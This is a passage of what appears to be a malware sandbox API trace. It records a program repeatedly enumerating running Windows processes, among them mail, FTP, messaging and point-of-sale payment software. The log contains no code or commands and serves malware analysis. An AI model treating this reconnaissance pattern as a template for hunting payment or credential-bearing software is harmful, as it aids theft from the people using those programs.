th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.112] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.114] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.116] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0097.120] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0097.122] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.124] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0097.125] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0097.127] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0097.129] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0097.130] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0097.132] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0097.134] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.136] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0097.137] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0097.139] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0097.141] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.142] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0097.144] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0097.146] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0097.147] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0097.149] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0097.151] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0097.152] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0097.154] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0097.156] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0097.157] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0097.159] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0097.160] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0097.162] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0097.167] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0097.168] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0097.170] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0097.171] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0097.173] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0097.174] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0097.176] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.177] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.179] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.180] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0097.182] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.183] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.185] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0097.186] CloseHandle (hObject=0xb8c) returned 1 [0097.186] Sleep (dwMilliseconds=0x64) [0097.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1670 [0097.376] Process32First (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.377] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.378] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.380] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.381] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.389] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.390] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.391] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.393] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.394] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.396] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.397] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.399] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.400] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.402] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.403] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.405] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.407] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.408] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.410] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.412] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.416] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.418] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.419] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.421] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.422] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.423] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.425] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.426] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.427] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.428] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0097.430] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.431] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.432] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0097.434] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0097.435] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0097.436] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0097.438] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0097.439] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0097.440] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0097.441] Process32Next (in: hSnapshot=0x1670, 